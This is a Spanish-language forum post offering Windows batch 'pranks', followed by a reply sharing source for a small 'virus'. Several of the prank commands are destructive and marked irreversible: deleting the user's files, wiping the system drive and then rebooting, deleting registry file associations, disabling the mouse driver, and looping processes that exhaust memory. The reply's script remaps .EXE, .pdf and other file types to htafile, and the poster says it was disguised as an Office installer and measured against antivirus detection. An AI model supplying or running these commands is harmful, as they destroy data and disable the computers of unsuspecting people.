[BATCH] Pranks

HOLA!!!

Les dejo una lista de Pranks (bromas pesadas) en BATCH:

1 Deshabilitar Mouse:

set key="HKEYLOCALMACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4_

2 Invertir Mouse:

Rundll32 user32,SwapMouseButton

3 Eliminar toda la carpeta del usuario que corre el script: [PELIGROSO, SIN ARREGLO]

del /f /q "C:\Users\%userprofile%\*.*"

4 Cambiar hora de la pc:

time 00:00

5 File Flood:

:start
echo Hola >>%random%.txt
goto start

6 Romper PC: [PELIGROSO, SIN ARREGLO]

del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

7 Error sos muy tonto, el sitstema se reiniciara para ver si no estas cuando vuelva:

msg * Error Fatal debido a la idiotez del usuario actual!
shutdown -c "Error! sos muy tonto, el sitstema se apagará para ver si no estás cuando vuelva!" -s -t 10

8 Destruir registro: [PELIGROSO, SIN ARREGLO]

START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MSGX
ECHO Tu pc ha sido destruida, que tengas un gran dia!
GOTO MSGX

9 Ram Overflow con notepads:

:nuevo
START %SystemRoot%\system32\notepad.exe
GOTO nuevo

GRACIAS POR LEER!!!

UMM INTERESANTE. YO Hice un virus simple que confunde los formatos por medio del registro. la cual causaba q no pudieras correr ningún formato .msi .exe .mp4 . no corría nada ni siquiera el administrador de tareas , ni siquiera el antivirus. bueno probé varios y el único que lo detectaba es el 360 total security realmente es el mejor antivirus q he probado aparte de DR,Web antivirus.

eliminen ese avast , avg , o panda son antivirus Basura.

Para Windows les recomiendo :

360 total security

Para android el mejor antivirus que he encontrado es (puede eliminar esos 50 virus de mi android , he incleso ese maldi** virus llamado Netalpha):

DR,Web antivirus

---

Bueno me desvíe del tema al que me refería :V . Bueno el virus del que hablaba es este:

Source code (ATENCION :  este virus puede llegar a ser peligroso , si le ponen una linea debilitando el registro y otra linea confundiendo los formatos .bat y otros formatos de ejecución puede a llegar a ser peligroso. (sin reparacion) ):

@echo off
reg add HKCU\Software\Classes\.VBS /d "htafile" /f
reg add HKCU\Software\Classes\.docx /d "htafile" /f
reg add HKCU\Software\Classes\.pdf /d "htafile" /f
reg add HKCU\Software\Classes\.doc /d "htafile" /f
reg add HKCU\Software\Classes\.mp3 /d "htafile" /f
reg add HKCU\Software\Classes\.mp4 /d "htafile" /f
reg add HKCU\Software\Classes\.EXE /d "htafile" /f
exit

Bueno el virus lo copile y lo disfrace  de Microsoft Ofice 2007 Installer y lo que paso fue que al subirlo al virustotal o a Hibrid Analizis me lo detectaron como RAMSOMWARE Pueden creerlo un simple scrip Batch detectado como ramsomware. "REALMENTE ME CAGUE DE LA RISA  "

Para que vean que no miento (la primera vez que lo subí solo lo detectaban unos 4 de 64 ) :

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

---

Algunas imágenes después de abrir el virus :

Intentando abrir el navegador : (Ojo todos los formatos que confundas se abrirán así )

---

Bueno ahora Viene la solución a esta virus osea el Parche . (No crean que me voy a auto-joder con mi propia creación)

parche removido

Bueno cuando abran el Parche les pedirá una contraseña que es : 2111995 , Como ven el Ofusque el codigo fuente del Parche con la herramienta BatchCrypt , Perdon por no proporcionar el codigo desofuscado pero lo perdi y me da flojera ponerme a desofuscarlo . :v